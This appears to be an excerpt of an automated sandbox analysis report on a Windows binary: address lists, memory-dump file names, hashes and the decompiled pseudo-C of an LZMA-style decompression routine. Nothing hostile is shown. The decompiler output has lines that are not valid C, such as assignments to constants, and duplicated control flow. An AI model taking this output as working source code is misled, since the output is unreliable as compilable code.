                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00000000
                  0x00000000
                  0x00406efe
                  0x00406efe
                  0x00406f02
                  0x0040703a
                  0x00000000
                  0x0040703a
                  0x00406f08
                  0x00406f0b
                  0x00406f0e
                  0x00406f12
                  0x00406f15
                  0x00406f1b
                  0x00406f1d
                  0x00406f1d
                  0x00406f1d
                  0x00406f20
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f26
                  0x00406f26
                  0x00406f2a
                  0x00406f8a
                  0x00406f8d
                  0x00406f92
                  0x00406f93
                  0x00406f95
                  0x00406f97
                  0x00406f9a
                  0x00406ea6
                  0x00406ea6
                  0x00000000
                  0x00406eac
                  0x00406ea6
                  0x00406f2c
                  0x00406f32
                  0x00406f35
                  0x00406f38
                  0x00406f3b
                  0x00406f3e
                  0x00406f41
                  0x00406f44
                  0x00406f47
                  0x00406f4a
                  0x00406f4d
                  0x00406f66
                  0x00406f69
                  0x00406f6c
                  0x00406f6f
                  0x00406f73
                  0x00406f75
                  0x00406f75
                  0x00406f76
                  0x00406f79
                  0x00406f4f
                  0x00406f4f
                  0x00406f57
                  0x00406f5c
                  0x00406f5e
                  0x00406f61
                  0x00406f61
                  0x00406f7c
                  0x00406f83
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406c21
                  0x00406c24
                  0x00406c5a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8d
                  0x00406d8d
                  0x00406d90
                  0x00406d92
                  0x0040701c
                  0x00000000
                  0x0040701c
                  0x00406d98
                  0x00406d9b
                  0x00000000
                  0x00000000
                  0x00406da1
                  0x00406da5
                  0x00406da8
                  0x00406da8
                  0x00406da8
                  0x00000000
                  0x00406da8
                  0x00406c26
                  0x00406c28
                  0x00406c2a
                  0x00406c2c
                  0x00406c2f
                  0x00406c30
                  0x00406c32
                  0x00406c34
                  0x00406c37
                  0x00406c3a
                  0x00406c50
                  0x00406c55
                  0x00406c8d
                  0x00406c8d
                  0x00406c91
                  0x00406cbd
                  0x00406cbf
                  0x00406cc6
                  0x00406cc9
                  0x00406ccc
                  0x00406ccc
                  0x00406cd1
                  0x00406cd1
                  0x00406cd3
                  0x00406cd6
                  0x00406cdd
                  0x00406ce0
                  0x00406d0d
                  0x00406d0d
                  0x00406d10
                  0x00406d13
                  0x00406d87
                  0x00406d87
                  0x00406d87
                  0x00000000
                  0x00406d87
                  0x00406d15
                  0x00406d1b
                  0x00406d1e
                  0x00406d21
                  0x00406d24
                  0x00406d27
                  0x00406d2a
                  0x00406d2d
                  0x00406d30
                  0x00406d33
                  0x00406d36
                  0x00406d4f
                  0x00406d51
                  0x00406d54
                  0x00406d55
                  0x00406d58
                  0x00406d5a
                  0x00406d5d
                  0x00406d5f
                  0x00406d61
                  0x00406d64
                  0x00406d66
                  0x00406d69
                  0x00406d6d
                  0x00406d6f
                  0x00406d6f
                  0x00406d70
                  0x00406d73
                  0x00406d76
                  0x00406d38
                  0x00406d38
                  0x00406d40
                  0x00406d45
                  0x00406d47
                  0x00406d4a
                  0x00406d4a
                  0x00406d79
                  0x00406d80
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00000000
                  0x00406d82
                  0x00000000
                  0x00406d82
                  0x00406d80
                  0x00406c93
                  0x00406c96
                  0x00406c98
                  0x00406c9b
                  0x00406c9e
                  0x00406ca1
                  0x00406ca3
                  0x00406ca6
                  0x00406ca9
                  0x00406ca9
                  0x00406cac
                  0x00406cac
                  0x00406caf
                  0x00406cb6
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00000000
                  0x00406cb8
                  0x00000000
                  0x00406cb8
                  0x00406cb6
                  0x00406c3c
                  0x00406c3f
                  0x00406c41
                  0x00406c44
                  0x00000000
                  0x00000000
                  0x004069a3
                  0x004069a3
                  0x004069a7
                  0x00406fec
                  0x00000000
                  0x00406fec
                  0x004069ad
                  0x004069b0
                  0x004069b3
                  0x004069b6
                  0x004069b9
                  0x004069bc
                  0x004069bf
                  0x004069c1
                  0x004069c4
                  0x004069c7
                  0x004069ca
                  0x004069cc
                  0x004069cc
                  0x004069cc
                  0x00000000
                  0x00000000
                  0x00406b2e
                  0x00406b2e
                  0x00406b32
                  0x00406ff8
                  0x00000000
                  0x00406ff8
                  0x00406b38
                  0x00406b3b
                  0x00406b3e
                  0x00406b41
                  0x00406b43
                  0x00406b43
                  0x00406b43
                  0x00406b46
                  0x00406b49
                  0x00406b4c
                  0x00406b4f
                  0x00406b52
                  0x00406b55
                  0x00406b56
                  0x00406b58
                  0x00406b58
                  0x00406b58
                  0x00406b5b
                  0x00406b5e
                  0x00406b61
                  0x00406b64
                  0x00406b64
                  0x00406b64
                  0x00406b67
                  0x00406b69
                  0x00406b69
                  0x00000000
                  0x00000000
                  0x00406dab
                  0x00406dab
                  0x00406dab
                  0x00406daf
                  0x00000000
                  0x00000000
                  0x00406db5
                  0x00406db8
                  0x00406dbb
                  0x00406dbe
                  0x00406dc0
                  0x00406dc0
                  0x00406dc0
                  0x00406dc3
                  0x00406dc6
                  0x00406dc9
                  0x00406dcc
                  0x00406dcf
                  0x00406dd2
                  0x00406dd3
                  0x00406dd5
                  0x00406dd5
                  0x00406dd5
                  0x00406dd8
                  0x00406ddb
                  0x00406dde
                  0x00406de1
                  0x00406de4
                  0x00406de8
                  0x00406dea
                  0x00406ded
                  0x00000000
                  0x00406def
                  0x00406b6c
                  0x00406b6c
                  0x00000000
                  0x00406b6c
                  0x00406ded
                  0x00407022
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00407059
                  0x00407059
                  0x00000000
                  0x00407059
                  0x00406ea6
                  0x00406e2d
                  0x00406e2a
                  0x00000000
                  0x00406a61

                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae4b4001fee964b3ec39fcc62e642dbd1d089b63cfe1c3a3d4f330af07c9f72e
                  • Instruction ID: 0ea1ed3bc64708edefeb163875b4580728164d017b9a5fabf4c3c9e69b53418c
                  • Opcode Fuzzy Hash: ae4b4001fee964b3ec39fcc62e642dbd1d089b63cfe1c3a3d4f330af07c9f72e
                  • Instruction Fuzzy Hash: 96712371D00229CBDF24CF98C854BADBBB1FF48305F15816AD856B7281C7395A96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406B7B, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406B7B() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407061))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
